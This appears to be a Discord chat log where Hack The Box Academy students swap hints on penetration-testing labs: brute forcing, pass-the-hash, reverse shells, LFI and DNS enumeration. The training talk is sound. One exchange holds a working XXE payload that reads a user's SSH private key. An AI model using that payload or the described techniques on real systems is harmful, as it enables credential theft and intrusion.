@chilly forge Could also be the case that a sys admin or blue teamer has locked down DNS traffic on TCP port 53 on a firewall but has forgotten about UDP, as it’s normally allowed outbound to respond to DNS queries.
You're totally right! Thank you SO SO much. I've been stuck on this for days. Managed to get it now 😄
i let hydra run for 90 minutes and i still haven't brute forced sam's password
@chilly forge Awesome dude, don’t overthink the next lab, just replicate what’s in the modules, and you’ll be alright.
Thanks for the advice! i'll keep that in mind
i'm fully lost on Password Attacks - Password Mutations, i've tried the 17k line cut, i've tried searching for only 11-character passwords, i've tried attacking FTP, i've tried sort -u and breaking the file into 10 different chunks. i must have done something wrong but i have no clue what it is or where i could have made the mistake
sure the password isnt 10 characters?
i was searching for past suggestions and one of them was to only search for 11 character passwords
i'm guessing you're saying it's actually 10
i didnt take note of the exact password but my memory triggers on 10 or 11 for some reason
i just DM'ed you 😉
oh, thanks for telling because discord is kinda poopy with dms
Time to fill up my lovely colored magic balls on a happy sunday
someone can help me out with hacking passwords with hashcat dictionary attack section? Reply or DM me please
Looking for someone to save my sanity on Login Brute Forcing Skills Assessment Service Attacks.
For initial SSH brute force, created a list of usernames using username-anarchy, and a custom wordlist just using first name and last name but no joy.
🙏
can anyone suggest me from where i can learn the basics of imap commands?
Try the "Footprinting" module. That has a section on IMAP and POP3.
This is a great source
Guys I need to say and admit that WHOEVER designed and wrote the MODULE ‘LEARNING PROCESS’ is an absolute GENIUS! If you guy didn’t take your time to go through that module I would certainly encourage you to do so!!
Worth every ‘cube’ (penny) 😉
what do you get with ifconfig
is crackmapexec smb bruteforce slow and tries 1 credential at a time? or my program is broken
im doing password attacks network services
tried to increase threads but same result
same speed as msfconsole use auxiliary/scanner/smb/smb_login
~~I have asked about Attacking Common Applications - Attacking GitLab before too, specifically the user enumeration part. One of the hints was ||to try one of the unconventional wordlists in that directory||. I believe I have tried them all, and must be missing something.
Here is how I compiled a complete usernames list, that I have attempted:
REMOVED
I would greatly appreciate any further assistance, and this is literally the last flag I need to complete the path to do the CPTS exam.~~
Nevermind.... the FLAG submission is case sensitive...
is anyone on the working with web services module on the academy, or can anyone guide me on what i'm doing wrong? i'm working on starting the apache server, however I continuously get the error 405. I've tried reinstalling and installing again, and when I go to the local host it's the same thing.
Stuck on Password-Attacks PtH. I have used mimikatz to PtH. I can see DC01 and david.txt but i have tried everything to open the flag via cmd but i am unable to connect to \dc01\david. I tried net use. Nothing works. I can see the flag. But I'm unable to open the flag.
Nvm. For anyone who's struggling with this: use type.
which module and service are you on?
I'm currently on the working with web services module, right towards the beginning as it's explaining web services and installing apache2 with the apt install command. i've uninstalled the packages and reinstalled and tried to start services but it still comes up with the error code. I've done the systemctl to check services and it continuously shows the apache2.service not started
the Web Service & API Attacks module?
ahh, sorry it's under the linux fundamentals (relatively new)
ohh that one also this could be long so shoot me a dm i'll help your troubleshoot
appreciate it brother will do
which section are you on? also nope, the pwnbox doesn't have the ens224 interface and the main interface for target is tun0
oh wait i think that section gives you an attack box, just rdp or ssh in and you should get something similar to the pwnbox but in the target network
i saw that i mean the section?
simulating being an external actor, you have to connect to a foothold machine and use that to access the internal network
some of the labs being the foothold is another attack box you log into, simulating assessments where the client puts you directly on the internal network, but you still gotta connect to it.
if thats the lab setup yeah
foothold is a generic term im using here
Exactly
its not gunna be there
its gunna be on the machine you have to connect to
which is the foothold
you and your browser -> pwnbox sitting on the vpn -> foothold box that may or may not also be an attack box -> internal AD network
read what I said again
Im not sure how to be more explicit
@wheat ginkgo the box they provide (as an attack box) you either SSH or RDP into it, then you are in the internal AD network
the pwnbox is NOT the foothold
Exactly, the pwnbox is just your way into the attacker machine (linux or windows)
yeah if you were connecting from the vpn instead, youd still have to connect to the foothold
connect to pwnbox/vpn -> connect to foothold machine -> get interface
Can you tell me the basic stuff of hacking
Yes, google.com is the most basic
if you head over to HTB Academy and sign up for an account you can start gaining experience by taking the course modules
There's a pinned post which might help:
#modules message
Hi guys, i'm stuck on Firewall and IDS/IPS Evasion - Medium Lab from "NETWORK ENUMERATION WITH NMAP" module
I tried a lot of ||different scans, source port modification, different scan types|| but i keep having ||open/filtered, closed or filtered||. I also have 'too many fingerprints' error now. Any hint ? ^^
This lab was kinda buggy for me when i did it, i tried every thing and it was not working from my VPN machine, decided to jump into the pwnbox and it worked immediately
usually in the lab details where youre starting the target machine
itll say "RDP or ssh into blah with blah creds"
I am using the PwnBox 😭😭😭🤣
Oh cc RM !
Remember that ||DNS uses two protocols||
Im using ||UDP Scan || but got no correct result
Hello guys, I am doing Footprinting Lab - Hard. I've scanned the machine and have 5 ports open, the other 65530 are closed. Based on the description information I used previously gathered credentials from the Easy and the Medium lab and the provided resource text file to get any valid username or authentication, but with no luck. I appreciate any hints what to do ... 😌
read the top, "The third server is an MX and management server for the internal network." and think about stuff you learned throughout the module...hope that helps
I've read that and tried all possible credentials against every service, still no luck.
did you scan that port?
How can I post an image here ?
verify yourself first #welcome
make sure you enumerate everything, leave no datagram unturned
I believe so, I got ||22, 110, 143, 993 and 995||.
but I only have htb academy
I will keep digging ...
Module name: WEB REQUEST
Section name: HTTP METHOD(GET)
problem: on starting instance (machine), search.php is not getting shown in browser devtools/network requests when i try to search a city on the given spawned machine's http web page.
yup
I tried to run the exploit 50064 but this message appears: “Exploit failed: NoMethodError undefined method `split’ for nil:NilClass”
I don’t know how to solve it
this is from the shells and payloads module?
yup
you will have to check your module options for the exploit you're trying to use
already did
check again and see if you're missing an option
note that some options, although optional, are necessary in some cases
i got in
glad to see that the first section of that module rubbed off on you
||the problem was with vhost option||
not gonna lie but it took me about 2 hours to solve question 3 of host2.
do you know how to verify my account, so I can upload images in this channel, I only have an htb academy account.
you'll probably have to create an htb account
server side attacks, ssi injection exploit example. Can somebody tell me in which directory the flag is? can't find it...
Usually the module tells you where to look
true. found it
Just starting out with fundamental lessons, is it kind of expected that you'll use a search engine to figure out some stuff? There's stuff that I'm able to figure out just through the help documents but every now and then I get one that I don't think I ever would've figured out and have to read up on what the command is doing.
it'll be a mix; as some of the modules that are more advanced don't hold your hand
and you'll either be reading the man pages of a command
or googling your use case
Cool, thanks for feedback. I felt bad for looking up some stuff but I legit was hardstuck.
some of it also depends on your level of knowledge on things
but I would say taking notes doesn't hurt
even on fundamentals
Does anyone have good pointers for Blind XSS?
Yeah I'm def taking notes, it's the starting out with linux stuff. I'm coming completely from a windows / Cisco IOS background.
ah
yeah it's a rough transition from someone who's solely used windows to using linux
going from C:\Users\user to /home/user
but then you'll catch yourself trying to run linux commands in cmd
:^)
So true and then there's commands in Windows that use /? instead of --help or -h
prime example trying to do cp in windows; when it's copy
the amount of times I mix those up is criminal
googling stuff and looking up documentation is a core feature of this industry
Yeah I just felt bad doing it in academy, like at work no problem I'm googling that thing all f'n day if I need to lol
Hello guys, Can you help me on Attacking Common services hard lab? What can be done with this:
Line 1: Linked servers cannot be used under impersonation without a mapping for the impersonated login.
I'm cpts 100% w00t w00t
When do you take the exam?
I’m gonna spend around 40-60 hours studying my notes and redoing labs and then take it. So probably 9-17 days from now. Spent over 200 hours on this course so might take a break for a day or two @acoustic owl
Good luck for the exam
And as soon as I do that I’ll retake oscp which I expect I’ll be able to pass without more studying. A few ppl who hold both say if you can do cpts you’ll do oscp no prob
I’ve taken oscp exam twice and got about half way and what I’ve experienced in this course makes me feel more than prepared
Thanks 🙂
is it worth setting up a github to make it easier to download scripts, etc. for CPTS, or pentesting in general or is that not really needed...
OSCP can contain BOF, CPTS has no BOF. But otherwise it is supposed to be similar. I myself have not done OSCP. So I can't make a comparison
True but htb does have binary exploitation which I will take before hand and I actually did decent with bo in oscp tho I’m now rusty haha
But def something to study for sure
You can also save the cheatsheets on your PC. GitHub is not absolutely necessary.
I used cherry tree for all my notes is that what you mean. I also will have all exploits and hashes and everything used for labs on my device. My goal is to be able to through every lab blind tho I will look in my notes just not the solutions for the labs
Oh you mean cheat sheets of module ya that’s a good idea to save them all on host
@rustic sage when did u start the path
You can also write your own cheat sheets. It doesn't matter if you manage them in Cherry Tree or any other program. Use the one that is easiest for you.
About 2 to 2 1/2 months ago
WOW, what a great couple of sections for pass the hash and pass the ticket
@placid quest took me about 210 hours
Good luck @rustic sage
Which is insane bc when I first started I was so lazy lol but just built up to 5-8 hours a day as I progressed and it became second nature
Thanks man 🙂
If anyone needs help hit me up I’ll be able to help you quickly
@rustic sage That means u have done bug bounty path
Be careful not to get requests like "Can you hack my ex-girlfriend's Instagram account?". 🤣
Lol I would just ignore those haha already have gotten two like that
I’m 70% done with bug bounty and will pursue that once I get my other veers
Certs*
Cbbh actually looks easy looking at remaining modules
@rustic sage i am planning to do certs* if i complete the path
Don't underestimate CBBH
Don’t say IF. Just make up your mind and do it. Try to do a little more than the day before in terms of time spent studying eventually it’ll become second nature and you’ll rly enjoy it
Oh for sure, I’m just saying the modules remaining seem easy compared to the ones I’ve already done. It’s like attacking Wordpress and a few other easy seeming ones. I think I’ve already done the hardest portion of cbbh but I could def be wrong!
@acoustic owl Does that mean CBBH is hell
That depends on your skill level and stuff I think. Now the cbbh exam may be challenging as hell idk
No, but 21y4d has come up with some nice things for this exam.
The exam is difficult, but solvable
ok good to know i was on the right track with attacking this service lol I just had to clear my firefox cache; good thing I had burpsuite to sanity check me on the SSL cert
because HOLY was I gonna be banging my head on the wall trying to even find the exploit xD
I would appreciate a nudge if someone has the time on the sqlmap module concerning Case#3. I think I'm struggling with syntax
hi, OpenAI chat box is great for learning
DM
Actually nevermind. After about 100 attempts I realized what I was doing
Thanks anyways, I appreciate it.
it begins
@dim cosmos Thanks for the attempted help. I figured it out the next day, just needed to step away and come at it fresh.
Best of luck
Try not to jump off a cliff
Gonna need more info than "help me with this"
Hey guys, is there an alternate way to increase "cubes" without paying money? (like solving something and getting a reward or gift or something)
No
You get the ~40 for starting, you get some cubes refunded when you complete a module so there's that
I think the level 0? ones are 10 cubes, but when you finish them, you get 10 back.
Is there a way to tell ffuf to only show you results that have a status code of 200?
Or any arbitrary status code, for that matter.
I know there's a blacklist filter ( -fc) but I don't remember the whitelist
Thanks. Surely if there's a blacklist filter, then there must be a whitelist one. I'll see what I can find out about that.
its the matcher
so you want -mc
look in the man page
its there
Excellent, tyvm
np
is anyone available to assist me on the IMAP/POP3 footprinting? i got in the IMAP server but im not seeing emails
it ends
enumerate
the IMAP server i mean.
ive done the enumeration
or POP3
on both
dig around
there are 0 emails for me to find. which im assuming the last question is wanting me to do
question is asking you to try to access the emails on the IMAP server
naturally, there should be emails on the server to access
yes. and it shows 0 emails
i cant select the dev.department.int which im assuming is just the above section. and the inbox shows 0 on both imap and pop3
there is an inbox containing some amount of emails
fiddle around with some of the IMAP commands you learned
yes ive been doing that. the one listed as INBOX is the only one i can select and it shows 0 exist
I got stuck on this but then used gui to read emails
Why http://gitlab.inlanefreight.local sometimes connects and sometimes not? Anyone had the same issue?
you used gui? like you installed a mail client and signed in using the given creds?
used evolution on parrot
let me try that route
you lifesaver you. that worked. but now im going to see if i can do this gui style too.
sorry in cli not gui
academy's giving me filtered ports so i can't do the exercise
hey guys
hey
o/
Looking for a little help. I have the user and the correct fail string and parameters for the Skill Assessment - Website in the Login Brute Forcing Module. I am not getting a hit with the usual password lists (rockyou-10.txt; rockyou times out before completing). Any nudge in the right direction would be appreciated.
Hi Htb dudes, I'm new here.
I have a question about the markup stage.
I have an issue in my Burp Suite: every time I send a request for Daniel's ssh key I get a 200 OK response
But the ssh key doesn't show in the response.
Please help me
Thanks in Advance. 🙏
200 ok just means that it accepted the request; not that it's going to send something back. I'd suggest taking a look into http response codes. Also what's the module you're working on?
Hi Marcie lee, thank you for the response.
Im working on the markup module now.
When I performed the xxe attack
On Daniel's ssh keys.
The response I got is 200 OK and the ssh keys don't show up, which is not what to expect when you send the xxe payload. Wonder why it doesn't show?
This the scripts im using <!DO TYPE foo [ <!ENTITY xxe SYSTEM 'C:/Users/Daniel/.ssh/id_rsa'> ] >
Is there anything I missed?
Try it like this:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'file:///C:/Users/Daniel/.ssh/id_rsa'> ]>
Markup is a box and not a module from the Academy. Your question is better off in channel #boxes
Hello guys I wonder how much cubes does it take to complete every course THX
Could use some, tried everything but can not get this to work: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
What i did:
- used PtH to RDP into Julio's account (MS01)
- opened cmd.exe and started the NC listener on 8001
- opened PS and applied Invoke-WMIexec, copy pastes the command with the revshell
- it says command executed on DC01
- i go back to cmd, the listener is still running but absolutely nothing is connected
I can not figure out what i am doing wrong. This is driving me crazy.
Always say which module. People remember questions by their modules D:
Module: Password-Attacks, Section: Pass the Hash (PtH).
Hi Htb dudes I have a question?
Thanks for the answer 🙏
Nvm, i got it to work. The example way of executing a rev shell does not work. I changed to port to 8888 instead of 8001. And I filled in the IP of the DC01 instead of stating DC01 as the target as the example says.
I already tried this the best as I can but the results of ssh key don't show up. The script is correct 💯. But I don't know where the issue lies.
why don't just read the walkthrough of markup?
could anybody help me out w/ the lfi skill assessment?
Hi all, would like to know any hints to complete 4 Questions in DNS module Footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I already tried:
- Bruteforce subdomains of the 2nd and 3rd level
- Use PTR records to all IPs in /16 net
- Recursive investigate all AXFR records
In what way do I need to dive deeper? One more thought is that I need to find the correct wordlists to bruteforce, but this task will turn into some kind of guessing, so can you please help 🙂
dm ?
sure
anyone?
hey there guys! I want to become a pentester. can someone give me any advice? I will be grateful
I did already follow every walkthrough I found on the internet.
I just only need the ssh key so that I can get ssh connection to Daniel account. I couldn't also see any daniel ssh keys available online.
Could you please upload the file here if you have the key. Thank you so much in advance.
It seems my burp suite is not working properly as it should be. It's just a trial edition.
Yeah on your end. But in my end it's not. Please help me
A good video to start with https://www.youtube.com/watch?v=4JZjj_H4ei4
Academy gives a lot of these foundational skills and some
Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2023-edition/
Academy: https://academy.tcm-sec.com
Timestamps:
0:00 - Introduction
0:41 - Intigriti Sponsorship
2:01 - Important Notes
4:12 - Building a Foundation
5:14 - Basic IT Skills
8:22 - Networking Skills
12:35 - Linux Skills
15:07 ...
thanks
I don't want to argue a lot because I'm stuck on this ssh keys issue for a week. Please help me
You're welcome. Go through the CPTS path and check out #cpts
ok will do it
you have everything to help you solve the exercise
Htb vip machine seems to be causing a lot of issues. Before, I also have had issues with foxy proxy that doesn't work. I assigned the IP address of the target machine so that it will filter out the traffic but it doesn't work. when i look up the burp suite the traffic route doesn't show anything, no traffic flowing. Empty results. I hope HTB will look into this issue.
foxyproxy and burpsuite are client side applications
I am a VIP member. So to speak
It was a really bad experience I wasted a lot of time.
you are responsible for setting up those applications
I know but Htb is claiming all the tools are at my hand if you're a VIP member.
The what?
my god, just finished the command injection skills assessment, what a nightmare
Do you understand me.
It is just ssh key all I need. That's it
It is not a big deal.
go get them
absolutely brutal assessment
could still use some help with lfi skill assessment
The one where you need to RDP into the other machine first yeah? Hint; first search using a different tool/resource. that one took me a sec of digging but you were told everything in the module
I don’t have to rdp into anything no
What's the module then?
Local file inclusions
Since your post got buried^
I tried fuzzing for hidden parameters and fuzzing with a buncha different lfi payloads to no avail
Website seems to be filtering anything that looks like path traversal even when urlencoded
Kind of stumped
I'm working through Active Directory Enumeration & Attacks "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux", and every time I run GetUserSPNs.py with the -request flag I get the error [-] [Errno Connection error (INLANEFREIGHT:88)] [Errno -3] Temporary failure in name resolution . GetUserSPNs.py works in terms of enumerating users, but it fails whenever I use the flags -request or -request-user to attempt to get the TGS. I've tried editing /etc/resolv.conf as well with the nameservers, but I keep getting the same error. Anyone know why this is happening or can offer any help? Thanks in advance.
Is there any way to switch to another user in windows without using the runas cmdlet?
Unless the switch user option is available on the start menu if you're RDP in
Google helps a lot with these broad questions
depending on the scenario yes, runas or switch user
additionally you can create a sacrificial process for the impersonated user that you can further use
Unless you only have cmd/powershell access (metasploit usually)
I don't have an interactive shell and runas does not support a password option on one line
are hack the box forums down?
Hello there!
I am stuck in module "Introduction to Bash scripting", in exercise "Flow Controls-Loops". Could anyone please help me? Thank you in advance!
iirc you can pass a PSCredential object to runas
Hello everyone!
Can anyone help me with this:
Introduction to NoSQL injection
Skill Assessment II?
I have found password reset page, but don't know what to do next
depends
Not really
Just having some issues with the HTB server
It seems to be checking my answers wrong
why did academy uncomplete the introduction to networking module...
i went back and checked and for all of the sections i had already marked them as completed
a new question?
there isn't a new question
"Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain." I am stuck in this question. can someone help me with this?
This happens bc they added a new section; look carefully to the right of the screen where they list the sections for the module. Look for a new one that doesn't have the green check mark thing and complete it
all of them were already completed when i looked, and the progress bar was completely full. when i went to the last section and clicked finish, academy said i completed the module and appended it to my completed modules list
Ya this has happened to me multiple times double check the module for a new section otherwise it’s just a fluke and u can ignore it and or reach out to support
For me it’s always bc it’s a new section added
Did you ever solve this issue? I keep getting it and have exhausted my options trying to fix it.
